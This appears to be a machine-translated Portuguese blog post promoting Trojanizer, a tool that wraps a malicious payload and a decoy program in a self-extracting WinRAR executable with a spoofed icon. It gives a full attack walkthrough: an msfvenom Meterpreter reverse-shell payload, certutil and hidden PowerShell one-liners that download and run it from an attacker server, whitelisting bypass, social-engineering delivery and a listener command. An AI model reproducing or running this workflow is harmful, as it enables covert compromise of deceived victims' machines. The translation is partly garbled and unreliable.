NOTÍCIAS

[ANONYMOUS][grids]

Trojanizer - Trojanize sua carga útil (WinRAR [SFX] Automatização)


A ferramenta Trojanizer usa WinRAR (SFX) para comprimir os dois arquivos inseridos pelo usuário e transforma-lo em um arquivo SFX executável (.exe). O arquivo sfx quando executado executará ambos os arquivos (nossa carga útil e o aplicativo legit ao mesmo tempo).

Para tornar o arquivo menos suspeito segmentar no tempo de execução, o trojanizador tentará substituir o ícone padrão (.ico) do arquivo sfx por um selecionado pelo usuário e suprimir todas as msgs do arquivo sandbox do arquivo SFX (Silencioso = 1 | Substituir = 1 ).

Trojanizer não irá criar trojans, mas a partir da perspectiva do alvo, ele replica o comportamento trojan '
(execute a carga útil em segundo plano, enquanto a aplicação legível executa em primeiro plano)

DEPENDÊNCIAS (aplicativos backend)

Zenity (bash-GUIs) | Vinho (x86 | x64) | WinRAr.exe (instalado no vinho)
"Trojanizer.sh irá baixar / instalar todas as dependências como elas são necessárias"

É recomendável editar e configurar a opção: SYSTEM_ARCH = [your_sys_arch] no arquivo 'settings' antes de tentar executar a ferramenta pela primeira vez.


PAYLOADS (agentes) ACEITADOS

.exe | .bat | .vbs | .ps1
"Todas as cargas úteis que o Windows / SFX pode extrair automaticamente-executar"

DENTE: Se selado 'SINGLE_EXEC = ON' no arquivo de configurações, o trojanizador aceitará qualquer tipo de extensão a ser inputed. 

APLICAÇÕES LEGIT ACEITES (chamarizes)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc.
"Todos os aplicativos que o Windows / SFX pode executar automaticamente-execute"

CONFIGURAÇÕES AVANÇADAS


As "opções avançadas" do Trojanizer só são acessíveis no arquivo 'settings', e só podem ser configuradas antes de executar a ferramenta principal (Trojanizer.sh)



- Opção avançada pré-definida

O Trojanizer pode ser configurado para executar um comando + do programa antes da extração / execução dos dois arquivos compactados (arquivo SFX). Isso permite que os usuários aproveitem o software pré-instalado para executar um comando remoto antes que a extração real ocorra no sistema de destino. Se estiver ativo, o trojanizador pedirá (zenity sandbox) para que o comando seja executado 


- Single_file_execution
Vamos ver o cenário seguinte: você tem uma carga útil dll para entrada que você precisa executar após a extração, mas os arquivos sfx não podem executar arquivos dll diretamente. Esta configuração permite aos usuários inserir um script de lote (.bat) que será usado para executar a carga útil dll. Tudo o que o Trojanizer precisa fazer é instruir o arquivo SFX para extrair ambos os arquivos e executar o script.bat 


O comportamento padrão do switch single_file_execution é para comprimir os dois arquivos inputed pelo usuário, mas apenas executa um deles no tempo de extração (o arquivo de 2º inputed será executado) ...

TROJANIZADOR E BYPASSES WHITELISTING APPL

Um monte de trabalho maravilhoso foi feito por muitas pessoas, especialmente @subTee, em relação ao bypass de listagem de aplicativos, que é eventualmente o que desejamos aqui: execute código arbitrário que abuse dos binários internos da Microsoft. Windows oneliners para baixar carga remota e executar código arbitrário

O exercício a seguir descreve como usar o trojanizador 'single_file_execution' e 'Presetup' switches avançados para soltar (download remoto) e executar qualquer carga usando 'certutil' ou 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit para construir nossa carga útil

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copie payload.exe para apache2 webroot e comece o serviço
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edite o arquivo 'configurações' do Trojanizer e ative:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - executando ferramenta trojanizer
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

- inicie um ouvinte e envie o arquivo sfx para o objetivo usando engenharia social

msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

Quando o arquivo sfx for executado, ele irá baixar o payload.exe do nosso servidor web apache2 para o destino e executá-lo antes de extrair 'screenshot.png' e 'AngryBirds.exe' (o último será executado para servir como chamariz) 

O follow oneliner usa 'método powershell (Downloadfile + start)' para alcançar o mesmo exercício anterior 'certutil'.

cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

O follow oneliner usa o método 'powershell (IEX + downloadstring)' para alcançar o mesmo (o loadload.ps1 não toca o disco)

cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DESCARREGAR / INSTALAR
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots xsf.conf - execute ambos os arquivos após a extração (comportamento trojan)




xsf.conf - single_file_execution + Presetup (opções avançadas) 


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil) 

xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX) 


Arquivo final do sfx com ícone alterado


Dentro do arquivo sfx (aberto com winrar) - comportamento trojan

Dentro do arquivo sfx (aberto com winrar) - single_file_execution


Tutoriais de vídeo